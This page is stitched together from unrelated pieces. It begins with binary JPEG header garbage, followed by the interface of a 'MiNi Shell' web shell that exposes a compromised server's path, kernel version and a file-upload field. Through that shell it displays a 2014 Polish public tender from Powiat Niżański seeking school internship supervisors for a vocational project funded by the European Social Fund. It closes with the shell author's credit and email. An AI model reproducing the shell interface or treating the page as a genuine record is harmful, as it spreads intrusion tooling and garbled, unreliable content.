JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20140507/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20140507/153320-N-2014.html

<p class="kh_header"><b>Nisko: Pełnienie funkcji szkolnego opiekuna praktyk w czasie realizacji praktyk zawodowych dla uczniów Zespołu	Szkół im. gen. Władysława Sikorskiego w Rudniku nad Sanem w ramach projektu pn.: Podkarpacie stawia na zawodowców, którego Partnerem jest Powiat Niżański, realizowanego w ramach Europejskiego Funduszu Społecznego,</b><br>
<b>Numer ogłoszenia: 153320 - 2014; data zamieszczenia: 07.05.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Niżański , Pl. Wolności 2, 37-400 Nisko, woj. podkarpackie, tel. 015 8412057, faks 015 8412700.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat-nisko.pl, poczta@powiat-nisko.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie funkcji szkolnego opiekuna praktyk w czasie realizacji praktyk zawodowych dla uczniów Zespołu	Szkół im. gen. Władysława Sikorskiego w Rudniku nad Sanem w ramach projektu pn.: Podkarpacie stawia na zawodowców, którego Partnerem jest Powiat Niżański, realizowanego w ramach Europejskiego Funduszu Społecznego,.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Pełnienie funkcji szkolnego opiekuna praktyk w czasie realizacji praktyk zawodowych dla uczniów Zespołu Szkół im. gen. Władysława Sikorskiego w Rudniku nad Sanem w ramach projektu pn.: Podkarpacie stawia na zawodowców, którego Partnerem jest Powiat Niżański, realizowanego w ramach Europejskiego Funduszu Społecznego, Priorytet IX, Działanie 9.2 Podniesienie jakości i atrakcyjności szkolnictwa zawodowego. Zamawiający podzielił zamówienie na 5 części.	
Szczegółowy opis przedmiotu zamówienia
Część 1: Pełnienie funkcji szkolnego opiekuna praktyk na praktyce zawodowej uczniów (6 praktykantów) - 6 stanowisk w branży mechanicznej. Praktykę odbywać będą uczniowie technikum mechanicznego - zawód technik mechanik zgodnie
z programem.
1.	Opieka nad grupą do 6 praktykantów. 
2.	Praktyka odbywać się będzie na terenie miasta Rudnika nad Sanem
3.	Termin objęcia i czas pełnienia funkcji opiekuna praktyk: 
	- praktyka odbywać się będzie od 26-30.05.2014 r.(5 dni po 8 godzin łącznie 40 godzin)	zgodnie z zawartą umową,
	- termin obowiązywania umowy do 30 maja 2014 r.
Część 2: Pełnienie funkcji szkolnego opiekuna praktyk na praktyce zawodowej uczniów (7 praktykantów) - 7 stanowisk w branży mechanicznej. Praktykę odbywać będą uczniowie technikum mechanicznego - zawód technik mechanik zgodnie
z programem.
1.	Opieka nad grupą do 7 praktykantów. 
2.	Praktyka odbywać się będzie na terenie miasta Rudnika nad Sanem
3.	Termin objęcia i czas pełnienia funkcji opiekuna praktyk: 
	- praktyka odbywać się będzie od 26-30.05.2014 r.(5 dni po 8 godzin łącznie 40 godzin)	zgodnie z zawartą umową,
	- termin obowiązywania umowy do 30 maja 2014 r.
Część 3: Pełnienie funkcji szkolnego opiekuna praktyk na praktyce zawodowej uczniów (8 praktykantów) - 8 stanowisk w branży mechanicznej. Praktykę odbywać będą uczniowie technikum mechanicznego - zawód technik pojazdów samochodowych zgodnie z programem.
1.	Opieka nad grupą do 8 praktykantów. 
2.	Praktyka odbywać się będzie na terenie miasta Rudnika nad Sanem
3.	Termin objęcia i czas pełnienia funkcji opiekuna praktyk: 
	- praktyka odbywać się będzie od 26-30.05.2014 r.(5 dni po 8 godzin łącznie 40 godzin) zgodnie z zawartą umową,
- termin obowiązywania umowy do 30 maja 2014 r.
Część 4: Pełnienie funkcji szkolnego opiekuna praktyk na praktyce zawodowej uczniów (7 praktykantów) - 7 stanowisk w branży mechanicznej. Praktykę odbywać będą uczniowie technikum mechanicznego - zawód technik pojazdów samochodowych zgodnie z programem.
1.	Opieka nad grupą do 7 praktykantów. 
2.	Praktyka odbywać się będzie na terenie miasta Rudnika nad Sanem
3.	Termin objęcia i czas pełnienia funkcji opiekuna praktyk: 
	- praktyka odbywać się będzie od 26-30.05.2014 r.(5 dni po 8 godzin łącznie 40 godzin) zgodnie z zawartą umową
	- termin obowiązywania umowy do 30 maja 2014 r.
Część 5: Pełnienie funkcji szkolnego opiekuna praktyk na praktyce zawodowej uczniów (6 praktykantów) - 6 stanowisk w branży drzewnej. Praktykę odbywać będą uczniowie technikum przemysłu drzewnego - zawód technik technologii drewna zgodnie z programem.
1. Opieka nad grupą 6 praktykantów.
2. Praktyka odbywać się będzie na terenie miasta Rudnika nad Sanem
3. Termin objęcia i czas pełnienia funkcji opiekuna praktyk: 
- praktyka odbywać się będzie od 26-30.05.2014 r.(5 dni po 8 godzin łącznie 40 godzin) zgodnie z zawartą umową,
- termin obowiązywania umowy do 30 maja 2014 r.
Projekt ma charakter edukacyjny i skierowany jest do trzech szkół ponadgimnazjalnych, dla których organem prowadzącym jest Powiat Niżański. Świadczenia usług odbywać się będą na podstawie umowy - zlecenia (odrębne umowy dla każdej z części zamówienia). 
Informacje dotyczące wszystkich części zamówienia:
Praktykę odbywać będą uczniowie klas 3 - uczących się w zawodach: technik mechanik, technik pojazdów samochodowych, technik technologii drewna, zgodnie z harmonogramem.
3.4 Wymagania względem Wykonawcy
Wykonawca będzie realizował umowę w wymiarze 40 godzin. Opiekun praktyki ze strony szkoły  zobowiązuje się współdziałać z Pracodawcą we wszystkich sprawach związanych z realizacją praktyki.
Rozliczenie wymiaru godzinowego pracy w projekcie odbywać się będzie po zakończeniu praktyki na podstawie złożonych przez Wykonawcę i zaakceptowanych przez koordynatora projektu list obecności praktykantów, listę obecności opiekuna potwierdzaną przez pracodawcę pracodawców, uzupełnione dzienniki praktyk oraz miesięczną kartę czasu pracy opiekuna praktyk.
Wymagania Zamawiającego co do osoby pełniącej funkcję opiekuna praktyk:
- minimum średnie wykształcenie techniczne kierunkowe,
- uprawnienia pedagogiczne,
- staż pracy minimum 1 rok nauczania przedmiotów zawodowych lub praktycznej nauki zawodu,
Do obowiązków opiekuna uczniów na praktyce zawodowej będzie należało:
1)	nadzór i monitorowanie przebiegu praktyk w zakładach pracy zgodnie z programem  praktyk zatwierdzonym przez dyrektora szkoły z której są praktykanci,
2)	realizacja programu praktyk zawodowych w porozumieniu z pracodawcą,
3)	kontrola realizacji programu praktyk,
4)	opieka nad uczniami przebywającymi na praktyce oraz podejmowanie działań zaradczych w przypadku zgłaszanych problemów przez praktykantów lub pracodawców,
5)	powiadomienie szkoły o naruszeniu przez praktykanta dyscypliny pracy,
6)	współdziałanie z osobami hospitującymi i monitorującymi realizację praktyk, 
7)	współpraca w sprawdzaniu obecności uczniów na praktyce zawodowej z opiekunem praktyk z zakładu pracy (lista obecności na początku i na końcu dnia praktyk),
8)	dbanie o zachowanie przepisów bhp i ppoż.,
9)	sporządzanie dokumentacji przebiegu praktyk (zestawień, ankiet, sprawozdań na drukach otrzymanych od koordynatora  szkolnego projektu,)
10)	nadzór i pomoc w prowadzeniu przez praktykanta dziennika przebiegu praktyki, 
11)	wykonywanie wszystkich czynności administracyjnych związanych z dokumentacją i ewaluacją przebiegu praktyk,
12)	współdziałanie z dyrektorem szkoły, wysyłającym uczniów na praktykę, przedstawicielem zakładu pracy, koordynatorem szkolnym i koordynatorem projektu,
13)	dbanie o swój wygląd i powierzonych praktykantów,
14)	przestrzeganie ustalonego czasu pracy i regulaminów obowiązujących w zakładzie pracy,
15)	udzielanie codziennego instruktażu wstępnego i podsumowującego.
Zamawiający wymaga, aby wszystkie dokumenty wystawione przez Wykonawcę wynikające z realizacji zamówienia zawierały logo projektu zgodnie ze wzorem załączonym do SIWZ (załącznik nr 6).
W przypadku wykonywania zadań w więcej niż w jednym projekcie, w ramach Narodowych Strategicznych Ram Odniesienia (NSRO), Wykonawca jest zobowiązany do prowadzenia i udostępniania Zamawiającemu - w okresie realizacji zadań w ramach projektu pn.: Podkarpacie stawia na zawodowców - ewidencji godzin i zadań realizowanych w ramach wszystkich projektów NSRO, w której Wykonawca jest zaangażowany. Ewidencja powinna być prowadzona miesięcznie i przekazywana Zamawiającemu w terminie do 5 dni kalendarzowych od ostatniego dnia poprzedniego miesiąca
Wykonawca realizujący przedmiot zamówienia nie może być zatrudniony (dot. wyłącznie osób zatrudnionych w instytucjach uczestniczących w realizacji POKL na podstawie stosunku pracy) w instytucjach uczestniczących w realizacji Programu Operacyjnego Kapitał Ludzki, tj. Instytucji Zarządzającej, Instytucji Pośredniczącej, Instytucji Wdrażającej (Instytucji Pośredniczącej II stopnia), Regionalnych Ośrodkach EFS, Krajowym Ośrodku EFS, Krajowej Instytucji Wspomagającej, chyba że nie zachodzi konflikt interesów ani podwójne finansowanie, 
W przypadku zaangażowania Wykonawcy realizującego przedmiot zamówienia w więcej niż w jednym projekcie w ramach Narodowych Strategicznych Ram Odniesienia, obciążenie wynikające z pracy w kilku projektach nie może wykluczać prawidłowej i efektywnej realizacji wszystkich zadań powierzonych w ramach realizacji niniejszego przedmiotu zamówienia, łącznie zaangażowanie w realizację zadań projektowych nie może przekraczać 240 godzin miesięcznie. 
Wykonawca, którego oferta zostanie wybrana jako najkorzystniejsza, wraz z podpisaniem umowy złoży oświadczenie o zaangażowaniu w innych projektach współfinansowanych ze środków Unii Europejskiej oraz nie występowaniu konfliktu interesów oraz podwójnego finansowania w przypadku zatrudnienia w instytucjach uczestniczących w realizacji POKL.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 75.12.10.00-0, 80.20.00.00-6, 80.21.20.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.05.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełnienia tego warunku. Zamawiający dokona oceny spełniania warunku udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu. Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia (załącznik nr 2 do SIWZ),</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań  w zakresie spełnienia tego warunku. Zamawiający dokona oceny spełniania warunku udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu. Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia (załącznik nr 2 do SIWZ),</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań  w zakresie spełnienia tego warunku. Zamawiający dokona oceny spełniania warunku udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu. Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia (załącznik nr 2 do SIWZ),</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek ten zostanie spełniony jeżeli Wykonawca wykaże że na czas realizacji zamówienia będzie dysponował osobami biegle posługującymi się językiem polskim, posiadające:
1) minimum średnie wykształcenie techniczne kierunkowe, 
2) uprawnienia pedagogiczne,
3)staż pracy minimum 1 rok nauczania przedmiotów zawodowych lub praktycznej nauki zawodu.
Na potwierdzenie powyższych wymagań w stosunku do osób proponowanych do wykonania zamówienia Wykonawca przed podpisaniem umowy przedłoży Zamawiającemu:
1) świadectwo ukończenia szkoły średniej technicznej lub dyplom ukończenia studiów wyższych albo dokument ukończenia studiów podyplomowych na kierunku (specjalności) odpowiednim dla zawodu, którego będzie opiekunem,
2) zaświadczenie o uprawnieniach pedagogicznych, 
3) zaświadczenie o stażu pracy.
Wykonawca sporządzi wykaz osób (kadry dydaktycznej), które będą uczestniczyć 	w wykonywaniu zamówienia wraz z informacją na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami (Załącznika nr 4 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełnienia tego warunku. Zamawiający dokona oceny spełniania warunku udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu. Wykonawca potwierdza spełnienie warunku poprzez złożenie	oświadczenia (załącznik nr 2 do SIWZ),</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Formularz ofertowy (załącznik nr 1 do SIWZ) 2. W przypadku gdy Wykonawcę reprezentuje pełnomocnik do oferty winno być załączone pełnomocnictwo posiadające zakres uprawnień i podpisane przez osoby uprawnione do reprezentowania Wykonawcy</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszczalne są następujące rodzaje i warunki zmiany treści umowy:
1)gdy nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia;
2)gdy konieczność wprowadzenia zmian będzie następstwem zmian wprowadzonych w umowach pomiędzy Zamawiającym a inną niż Wykonawca stroną, w szczególności instytucją Zarządzającą, Pośredniczącą I i II stopnia,
a także innymi instytucjami, które na podstawie przepisów prawa mogą wpływać na realizację zamówienia;
3)gdy konieczność wprowadzenia zmian będzie następstwem zmian wytycznych dotyczących Programu Operacyjnego Kapitał Ludzki lub wytycznych i zaleceń Instytucji Zarządzającej lub Instytucji Pośredniczącej I i II stopnia,
w szczególności w zakresie sprawozdawczości;
4)gdy wystąpią obiektywne przeszkody uniemożliwiające realizację zamówienia lub osiągnięcie jego celów według pierwotnie przyjętego harmonogramu realizacji zamówienia;
5)zmiana terminu realizacji przedmiotu zamówienia, w przypadku:
a)gdy wykonanie zamówienia w określonym pierwotnie terminie nie leży
w interesie Zamawiającego, 
b)działania siły wyższej, uniemożliwiającego wykonanie zamówienia
w określonym pierwotnie terminie,
c)w przypadku wystąpienia obiektywnych czynników niezależnych
od Zamawiającego i Wykonawcy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.powiat-nisko.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Nisku, Plac Wolności 2, 37 - 400 Nisko - Wydział Gospodarki Mieniem Powiatu...</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.05.2014 godzina 10:45, miejsce: Starostwo Powiatowe w Nisku, Pl. Wolności 2, 37 - 400 Nisko w Biurze Obsługi Interesanta (pok. nr 1)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Pełnienie funkcji szkolnego opiekuna praktyk w czasie realizacji praktyk zawodowych dla uczniów Zespołu Szkół im. gen. Władysława Sikorskiego w Rudniku nad Sanem w ramach projektu pn.: Podkarpacie stawia na zawodowców, którego Partnerem jest Powiat Niżański, realizowanego w ramach Europejskiego Funduszu Społecznego, Priorytet IX, Działanie 9.2.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com